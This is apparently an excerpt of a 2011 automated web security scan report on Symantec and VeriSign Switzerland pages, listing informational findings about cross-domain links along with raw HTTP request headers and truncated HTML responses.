GET /store/services/index.jsp?inid=us_pagenotfound_smb_store HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 25519 Cache-Control: public, max-age=3530 Date: Fri, 09 Sep 2011 21:31:13 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Store Services - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta ...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... <li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... 
<li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... <li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... <li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... 
<li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.64. http://www.verisign.ch/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/
Issue detail
The page was loaded from a URL containing a query string:http://www.verisign.ch/?tid=header-logo The response contains the following links to other domains:http://blogs.verisign.com/?tid=footer http://cdn.verisign.com/assets/shared/css/header.css http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png http://cdn.verisign.com/authweb/en_ch/assets/home/css/en_ch_home.css http://cdn.verisign.com/authweb/en_ch/assets/home/images/verisign_inc_promo_home.png http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js http://cdn.verisign.com/authweb/global/assets/home/css/home.css http://cdn.verisign.com/authweb/global/assets/home/js/home.js?071211 http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico http://cdn.verisign.com/authweb/global/assets/shared/images/hp-promo-fingerprint.png http://cdn.verisign.com/authweb/global/assets/shared/images/shoppingcart.png http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911 http://ch.norton.com/ http://smallbusiness.norton.com/ http://verisign.com/partnersupport/worldwide/partnersupport.html http://www.pctools.com/de/ http://www.symantec.com/ http://www.symantec.com/de/ch/about/news/release/index.jsp http://www.verisign.co.jp/ http://www.verisign.co.nz/ http://www.verisign.co.uk/ http://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html 
http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps http://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to http://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html http://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps http://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps http://www.verisign.com.au/ http://www.verisign.com.br/ http://www.verisign.com.hk/ http://www.verisign.com.sg/ http://www.verisign.com.tw/ http://www.verisign.com/ http://www.verisign.com/ar/ http://www.verisign.com/ca/ http://www.verisign.com/cl/ http://www.verisign.com/latinamerica/esp/ http://www.verisign.com/mx/ http://www.verisign.com/nl/ http://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo http://www.verisign.com/verisign-worldwide/index.html?tid=footer http://www.verisignchina.com.cn/ https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport https://products.verisign.com/geocenter/reseller/logon.do https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en 
https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VRSN_CH
Request
GET /?tid=header-logo HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 31344 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <meta http-equiv="X-UA-Compatible" content="IE=7" /> <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" /> <script type="text/javascript">...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script> <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" /> <!--[if IE 6]>...[SNIP]... <![endif]--> <link href="http://cdn.verisign.com/authweb/global/assets/home/css/home.css" rel="stylesheet" /> <!--[if IE 6]>...[SNIP]... <![endif]--> <link rel='stylesheet' href='http://cdn.verisign.com/authweb/en_ch/assets/home/css/en_ch_home.css' /> </head>...[SNIP]... <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7]>...[SNIP]... <a href="/?tid=header-logo" title="Now from Symantec - VeriSign Authentication Services"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png" /> </a>...[SNIP]... <li><a href='//www.verisign.com/ar/'> Argentina</a>...[SNIP]... <li><a href='//www.verisign.com.au/'> Australia</a>...[SNIP]... <li><a href='//www.verisign.com.br/'> Brazil</a>...[SNIP]... <li><a href='//www.verisign.com/ca/'> Canada</a>...[SNIP]... <li><a href='//www.verisign.com/cl/'> Chile</a>...[SNIP]... <li><a href='//www.verisignchina.com.cn/'> China</a>...[SNIP]... <li><a href='//www.verisign.com.hk/'> Hong Kong</a>...[SNIP]... <li><a href='//www.verisign.co.jp/'> Japan</a>...[SNIP]... 
<li><a href='//www.verisign.com/latinamerica/esp/'> Latin America</a>...[SNIP]... <li><a href='//www.verisign.com/mx/'> Mexico</a>...[SNIP]... <li><a href='//www.verisign.com/nl/'> Netherlands</a>...[SNIP]... <li><a href='//www.verisign.co.nz/'> New Zealand</a>...[SNIP]... <li><a href='//www.verisign.com.sg/'> Singapore</a>...[SNIP]... <li><a href='//www.verisign.com.tw/'> Taiwan</a>...[SNIP]... <li><a href='//www.verisign.com/'> United States</a>...[SNIP]... <li><a href='//www.verisign.co.uk/'> United Kingdom</a>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script> <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100"> <param name="movie" value="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en">...[SNIP]... <param name="allowScriptAccess" value="always"> <embed src="https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en" loop="false" menu="false" quality="best" wmode="transparent" swliveconnect="FALSE" name="s_s" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer" allowscriptaccess="always" align="" height="72" width="100"/> </object>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps'> Two-Factor Authentication</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href='//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps'> Digital IDs for Secure Email</a>...[SNIP]... 
<li><a href='//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to'> Detect Fraud Online</a>...[SNIP]... <a href="/ssl/free-trial/index.html?tid=gnps-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" width="170" height="183" /> </a>...[SNIP]... <p class="small"><a rel="external" href="//verisign.com/partnersupport/worldwide/partnersupport.html"> Email support for login help.</a>...[SNIP]... </div> <a href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo" class="promo-link"> <img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg" alt="See all Featured SSL Partners" width="170" height="231" /> </a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport'> SSL Certificates Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport'> VeriSign Trust™ Seal Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport'> Code Signing Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport'> Digital IDs for Secure Email Support</a>...[SNIP]... <li><a href='https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport'> Managed PKI Support</a>...[SNIP]... </div> <a href="https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo" class="promo-link"> <img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." width="170" height="183" /> </a>...[SNIP]... 
<li><a href='https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href='https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href='https://products.verisign.com/geocenter/reseller/logon.do'> VeriSign Partner Center Sign In</a>...[SNIP]... <div class="buttondiv-ie"><a class="trybutton" href="https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH"> <span>...[SNIP]... <div class="ab_cell"><a class="accelbtn" href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VRSN_CH"> <span class="ab_buybtn">...[SNIP]... </a> <a href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VRSN_CH"> VeriSign Trust Seal</a>...[SNIP]... <div class="ab_cell"><a class="accelbtn" href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> <span class="ab_signinbtn">...[SNIP]... </a> <a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center</a>...[SNIP]... <a href='/ssl/ssl-information-center/increase-traffic-conversion/index.html?tid=hp_promo' ><img src='http://cdn.verisign.com/authweb/global/assets/shared/images/shoppingcart.png' alt="VeriSign Trusted" height='84' /> </a>...[SNIP]... <a href='/ssl/ssl-information-center/diginotar-breach-alert/index.html' ><img src='http://cdn.verisign.com/authweb/global/assets/shared/images/hp-promo-fingerprint.png' alt="SSL Security Breaking News." height='84' /> </a>...[SNIP]... 
<a class='promo_img' href='/verisigninc' rel='external'><img src='http://cdn.verisign.com/authweb//en_ch/assets/home/images/verisign_inc_promo_home.png' alt='Discover the brand new look of Verisign - Domain Name Services, Network Intelligence and DNS Availability are now at http://www.verisigninc.com/en_CH/index.xhtml'> </a>...[SNIP]... <li><a href='http://www.symantec.com/de/ch/about/news/release/index.jsp'> News</a></li><li><a href='//blogs.verisign.com/?tid=footer'> Blogs</a>...[SNIP]... <li><a href='//www.verisign.com/verisign-worldwide/index.html?tid=footer'> Worldwide Sites</a>...[SNIP]... <p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'> Symantec Corp.</a>...[SNIP]... </a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html'> two-factor authentication</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html'> identity protection</a>...[SNIP]... </a> and <a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'> public key infrastructure</a> (<a href='//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html'> PKI</a>). Symantec products include <a href='http://ch.norton.com/'> Norton AntiVirus software</a>, <a href='http://smallbusiness.norton.com'> Norton Internet Security solutions for small business</a>, and <a href='http://www.pctools.com/de/'> PC Tools</a>...[SNIP]... </div> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"> </script>...[SNIP]... 
</script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/home/js/home.js?071211"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js"> </script>...[SNIP]...
14.65. http://www.verisign.ch/contact-information/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/contact-information/index.html
Issue detail
The page was loaded from a URL containing a query string:http://www.verisign.ch/contact-information/index.html?tid=footer The response contains the following links to other domains:http://blogs.verisign.com/ http://blogs.verisign.com/?tid=footer http://cdn.verisign.com/assets/shared/css/header.css http://cdn.verisign.com/assets/shared/js/curvycorners.js http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911 http://ch.norton.com/ http://press.verisign.com/ http://smallbusiness.norton.com/ http://verisign.com/partnersupport/worldwide/partnersupport.html http://www.addthis.com/bookmark.php?v=250 http://www.pctools.com/de/ http://www.symantec.com/ http://www.symantec.com/de/ch/about/news/release/index.jsp http://www.verisign.co.jp/ http://www.verisign.co.nz/ http://www.verisign.co.uk/ http://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html http://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps http://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to 
http://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html http://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps http://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps http://www.verisign.com.au/ http://www.verisign.com.br/ http://www.verisign.com.hk/ http://www.verisign.com.sg/ http://www.verisign.com.tw/ http://www.verisign.com/ http://www.verisign.com/ar/ http://www.verisign.com/ca/ http://www.verisign.com/cl/ http://www.verisign.com/latinamerica/esp/ http://www.verisign.com/mx/ http://www.verisign.com/nl/ http://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo http://www.verisign.com/press/awards/index.html http://www.verisign.com/support/ssl-certificates-support/secure-site-seal/abuse.html http://www.verisign.com/verisign-worldwide/index.html http://www.verisign.com/verisign-worldwide/index.html?tid=footer http://www.verisignchina.com.cn/ http://www.verisigninc.com/en_CH/index.xhtml?loc=en_CH https://cc-admin.geotrust.com/geocenter/reseller/logon.do https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo https://knowledge.verisign.ch/support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport https://press.verisign.com/easyir/customrel.do?easyirid=AFC0FF0DB5C560D3&version=live&prid=458311&releasejsp=custom_97 
https://products.verisign.com/geocenter/reseller/logon.do https://s7.addthis.com/js/250/addthis_widget.js?username=verisign https://seal.verisign.com/getseal?at=1&sealid=2&dn=www.verisign.ch&lang=en https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH https://www.verisign.com/cgi-bin/go.cgi?a=w18450112575241018
Request
GET /contact-information/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 39107

...[SNIP]...
14.66. http://www.verisign.ch/corporate/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.ch
Path: /corporate/index.html
Issue detail
The page was loaded from a URL containing a query string: http://www.verisign.ch/corporate/index.html?tid=footer
The response contains the following links to other domains:
Request
GET /corporate/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 36193

...[SNIP]...
14.67. http://www.verisign.ch/trust-seal/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.ch
Path: /trust-seal/index.html
Issue detail
The page was loaded from a URL containing a query string: http://www.verisign.ch/trust-seal/index.html?tid=gnps
The response contains the following links to other domains:
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/corporate/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 50059 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>VeriSign Trust Seal - Perfec...[SNIP]... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="stylesheet" href="//www.verisign.com/stellent/fragments/vrsncssassets/vrsnStyles.css" type="text/css" /> <link rel="stylesheet" href="/assets/partners/css/styles.css" type="text/css" />...[SNIP]... </script><script type="text/JavaScript" src="https://www.verisign.com/js/mbox.js"> </script>...[SNIP]... <noscript><iframe src="//view.atdmt.com/iaction/slctsl_2010Q2TrustSeal_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"> </iframe>...[SNIP]... <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7]>...[SNIP]... <meta http-equiv="X-UA-Compatible" content="IE=7" /> <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" /> <script type="text/javascript">...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script> <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" /> <!--[if IE 6]>...[SNIP]... <a href="/?tid=header-logo" title="Now from Symantec - VeriSign Authentication Services"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png" /> </a>...[SNIP]... <li><a href='//www.verisign.com/ar/'> Argentina</a>...[SNIP]... <li><a href='//www.verisign.com.au/'> Australia</a>...[SNIP]... <li><a href='//www.verisign.com.br/'> Brazil</a>...[SNIP]... 
<li><a href='//www.verisign.com/ca/'> Canada</a>...[SNIP]... <li><a href='//www.verisign.com/cl/'> Chile</a>...[SNIP]... <li><a href='//www.verisignchina.com.cn/'> China</a>...[SNIP]... <li><a href='//www.verisign.com.hk/'> Hong Kong</a>...[SNIP]... <li><a href='//www.verisign.co.jp/'> Japan</a>...[SNIP]... <li><a href='//www.verisign.com/latinamerica/esp/'> Latin America</a>...[SNIP]... <li><a href='//www.verisign.com/mx/'> Mexico</a>...[SNIP]... <li><a href='//www.verisign.com/nl/'> Netherlands</a>...[SNIP]... <li><a href='//www.verisign.co.nz/'> New Zealand</a>...[SNIP]... <li><a href='//www.verisign.com.sg/'> Singapore</a>...[SNIP]... <li><a href='//www.verisign.com.tw/'> Taiwan</a>...[SNIP]... <li><a href='//www.verisign.com/'> United States</a>...[SNIP]... <li><a href='//www.verisign.co.uk/'> United Kingdom</a>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script> <noscript> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" 